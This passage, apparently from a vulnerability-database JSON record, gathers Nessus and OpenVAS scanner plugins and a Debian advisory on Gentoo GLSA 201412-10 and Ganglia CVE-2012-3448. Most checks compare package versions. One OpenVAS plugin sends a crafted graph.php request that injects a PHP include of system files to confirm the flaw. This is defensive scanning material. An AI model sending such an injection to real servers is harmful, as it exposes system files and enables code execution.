EGroupware users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-apps/egroupware-1.8.004.20120613'\n All VTE 0.32 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-libs/vte-0.32.2'\n All VTE 0.28 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-libs/vte-0.28.2-r204'\n All Layer Four Traceroute users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/lft-3.33'\n All Suhosin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-php/suhosin-0.9.33'\n All Slock users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-misc/slock-1.0'\n All Ganglia users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-cluster/ganglia-3.3.7'\n All Jabber to GaduGadu Gateway users should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/gg-transport-2.2.4'\n NOTE: This is a legacy GLSA. Updates for all affected architectures have\n been available since 2013. 
It is likely that your system is already no\n longer affected by these issues.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:egroupware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ganglia\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gg-transport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lft\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:slock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vte\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-php/suhosin\", unaffected:make_list(\"ge 0.9.33\"), vulnerable:make_list(\"lt 0.9.33\"))) flag++;\nif (qpkg_check(package:\"net-analyzer/lft\", unaffected:make_list(\"ge 3.33\"), vulnerable:make_list(\"lt 3.33\"))) flag++;\nif (qpkg_check(package:\"x11-libs/vte\", unaffected:make_list(\"ge 0.32.2\", \"rge 0.28.2-r204\", \"rge 0.28.2-r206\"), vulnerable:make_list(\"lt 0.32.2\"))) flag++;\nif (qpkg_check(package:\"net-im/gg-transport\", unaffected:make_list(\"ge 2.2.4\"), vulnerable:make_list(\"lt 2.2.4\"))) flag++;\nif (qpkg_check(package:\"sys-cluster/ganglia\", unaffected:make_list(\"ge 3.3.7\"), vulnerable:make_list(\"lt 3.3.7\"))) flag++;\nif (qpkg_check(package:\"x11-misc/slock\", unaffected:make_list(\"ge 1.0\"), vulnerable:make_list(\"lt 1.0\"))) flag++;\nif (qpkg_check(package:\"www-apps/egroupware\", unaffected:make_list(\"ge 1.8.004.20120613\"), vulnerable:make_list(\"lt 1.8.004.20120613\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dev-php/suhosin / net-analyzer/lft / x11-libs/vte / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": 
"2018-08-31T11:10:46", "bulletinFamily": "software", "description": "- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2610-1 security@debian.org\r\nhttp://www.debian.org/security/ Yves-Alexis Perez\r\nJanuary 21, 2013 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : ganglia\r\nVulnerability : arbitrary script execution\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2012-3448\r\nDebian Bug : 683584\r\n\r\nInsufficient input sanitization in Ganglia, a web based monitoring system,\r\ncould lead to remote PHP script execution with permissions of the user running\r\nthe web browser. \r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 3.1.7-1+squeeze1.\r\n\r\nFor the testing distribution (wheezy), this problem has been fixed in\r\nversion 3.3.8-1.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 3.3.8-1.\r\n\r\nWe recommend that you upgrade your ganglia packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n", "modified": "2013-01-28T00:00:00", "published": 
"2013-01-28T00:00:00", "id": "SECURITYVULNS:DOC:28982", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28982", "title": "[SECURITY] [DSA 2610-1] ganglia security update", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2013-01-28T00:00:00", "published": "2013-01-28T00:00:00", "id": "SECURITYVULNS:VULN:12850", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12850", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:51:57", "bulletinFamily": "scanner", "description": "Insufficient input sanitization in Ganglia, a web based monitoring system,\ncould lead to remote PHP script execution with permissions of the user running\nthe web server.", "modified": "2017-07-07T00:00:00", "published": "2013-01-21T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=892610", "id": "OPENVAS:892610", "title": "Debian Security Advisory DSA 2610-1 (ganglia - arbitrary script execution)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2610.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2610-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software 
Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"ganglia on Debian Linux\";\ntag_insight = \"Ganglia is a scalable, real-time cluster monitoring environment\nthat collects cluster statistics in an open and well-defined XML\nformat.\";\ntag_solution = \"For the stable distribution (squeeze), this problem has been fixed in\nversion 3.1.7-1+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 3.3.8-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.3.8-1.\n\nWe recommend that you upgrade your ganglia packages.\";\ntag_summary = \"Insufficient input sanitization in Ganglia, a web based monitoring system,\ncould lead to remote PHP script execution with permissions of the user running\nthe web server.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892610);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2012-3448\");\n script_name(\"Debian Security Advisory DSA 2610-1 (ganglia - arbitrary script execution)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-01-21 00:00:00 +0100 (Mon, 21 Jan 2013)\");\n script_tag(name: \"cvss_base\", value:\"7.5\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n 
script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2610.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ganglia-monitor\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ganglia-webfrontend\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gmetad\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libganglia1\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libganglia1-dev\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ganglia-monitor\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ganglia-monitor-python\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ganglia-webfrontend\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gmetad\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"libganglia1\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libganglia1-dev\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:15", "bulletinFamily": "scanner", "description": "Ganglia is prone to a vulnerability that lets remote attackers execute\n arbitrary code.", "modified": "2018-10-10T00:00:00", "published": "2012-08-13T00:00:00", "id": "OPENVAS:1361412562310103535", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103535", "title": "Ganglia PHP Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ganglia_54699.nasl 11826 2018-10-10 14:38:27Z cfischer $\n#\n# Ganglia PHP Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ganglia:ganglia-web\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103535\");\n script_bugtraq_id(54699);\n script_cve_id(\"CVE-2012-3448\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 11826 $\");\n script_name(\"Ganglia PHP Code Execution Vulnerability\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-10 16:38:27 +0200 (Wed, 10 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-13 12:40:50 +0200 (Mon, 13 Aug 2012)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ganglia_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"ganglia/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/54699\");\n script_xref(name:\"URL\", value:\"http://ganglia.sourceforge.net/\");\n script_xref(name:\"URL\", value:\"http://console-cowboys.blogspot.de/2012/07/extending-your-ganglia-install-with.html\");\n\n script_tag(name:\"summary\", value:\"Ganglia is prone to a vulnerability that lets remote attackers execute\n arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to execute arbitrary PHP code within\n the context of the affected web server process.\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. 
Please see the references for more\n information.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port))exit(0);\nif(dir == \"/\") dir = \"\";\n\nfiles = traversal_files();\n\nforeach pattern(keys(files)) {\n\n file = files[pattern];\n\n url = dir + '/graph.php?g=cpu_report,include+%27/' + file + '%27';\n\n if(http_vuln_check(port:port, url:url, pattern:pattern)) {\n report = report_vuln_url(port:port, url:url);\n security_message(data:report, port:port);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:57", "bulletinFamily": "scanner", "description": "Insufficient input sanitization in Ganglia, a web based monitoring system,\ncould lead to remote PHP script execution with permissions of the user running\nthe web server.", "modified": "2019-03-18T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:1361412562310892610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892610", "title": "Debian Security Advisory DSA 2610-1 (ganglia - arbitrary script execution)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2610.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2610-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software 
Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892610\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2012-3448\");\n script_name(\"Debian Security Advisory DSA 2610-1 (ganglia - arbitrary script execution)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 00:00:00 +0100 (Mon, 21 Jan 2013)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2610.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"ganglia on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (squeeze), this problem has been fixed in\nversion 3.1.7-1+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 3.3.8-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.3.8-1.\n\nWe recommend that you upgrade your ganglia 
packages.\");\n script_tag(name:\"summary\", value:\"Insufficient input sanitization in Ganglia, a web based monitoring system,\ncould lead to remote PHP script execution with permissions of the user running\nthe web server.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"ganglia-monitor\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ganglia-webfrontend\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"gmetad\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libganglia1\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libganglia1-dev\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ganglia-monitor\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ganglia-monitor-python\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ganglia-webfrontend\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"gmetad\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libganglia1\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libganglia1-dev\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2019-05-29T18:39:22", "bulletinFamily": "scanner", "description": "Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors.", "modified": "2018-10-25T00:00:00", "published": "2017-03-21T00:00:00", "id": "OPENVAS:1361412562310140197", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140197", "title": "Unspecified vulnerability in Ganglia Web before 3.5.1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ganglia_CVE-2012-3448.nasl 12095 2018-10-25 12:00:24Z cfischer $\n#\n# Unspecified vulnerability in Ganglia Web before 3.5.1\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ganglia:ganglia-web\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140197\");\n script_version(\"$Revision: 12095 $\");\n script_cve_id(\"CVE-2012-3448\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 14:00:24 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-21 11:57:25 +0100 (Tue, 21 Mar 2017)\");\n script_name(\"Unspecified vulnerability in Ganglia Web before 3.5.1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_ganglia_detect.nasl\");\n script_mandatory_keys(\"ganglia/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3448\");\n\n script_tag(name:\"summary\", value:\"Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"Ganglia Web before 3.5.1\");\n script_tag(name:\"solution\", value:\"Update to Ganglia Web before 3.5.1 or newer.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n 
exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nfix = '3.5.1';\n\nif( version_is_less( version:version, test_version:fix ) )\n{\n report = report_fixed_ver( installed_version:version, fixed_version:fix );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201412-10", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121296", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121296", "title": "Gentoo Security Advisory GLSA 201412-10", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201412-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121296\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:08 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201412-10\");\n script_tag(name:\"insight\", value:\"Vulnerabilities have been discovered in the packages listed below. Please review the CVE identifiers in the Reference section for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201412-10\");\n script_cve_id(\"CVE-2008-4776\", \"CVE-2010-2713\", \"CVE-2010-3313\", \"CVE-2010-3314\", \"CVE-2011-0765\", \"CVE-2011-2198\", \"CVE-2012-0807\", \"CVE-2012-0808\", \"CVE-2012-1620\", \"CVE-2012-2738\", \"CVE-2012-3448\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201412-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = 
\"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-apps/egroupware\", unaffected: make_list(\"ge 1.8.004.20120613\"), vulnerable: make_list(\"lt 1.8.004.20120613\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"x11-libs/vte\", unaffected: make_list(\"ge 0.32.2\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"x11-libs/vte\", unaffected: make_list(\"ge 0.28.2-r204\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"x11-libs/vte\", unaffected: make_list(\"ge 0.28.2-r206\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"x11-libs/vte\", unaffected: make_list(), vulnerable: make_list(\"lt 0.32.2\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-analyzer/lft\", unaffected: make_list(\"ge 3.33\"), vulnerable: make_list(\"lt 3.33\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-php/suhosin\", unaffected: make_list(\"ge 0.9.33\"), vulnerable: make_list(\"lt 0.9.33\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"x11-misc/slock\", unaffected: make_list(\"ge 1.0\"), vulnerable: make_list(\"lt 1.0\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"sys-cluster/ganglia\", unaffected: make_list(\"ge 3.3.7\"), vulnerable: 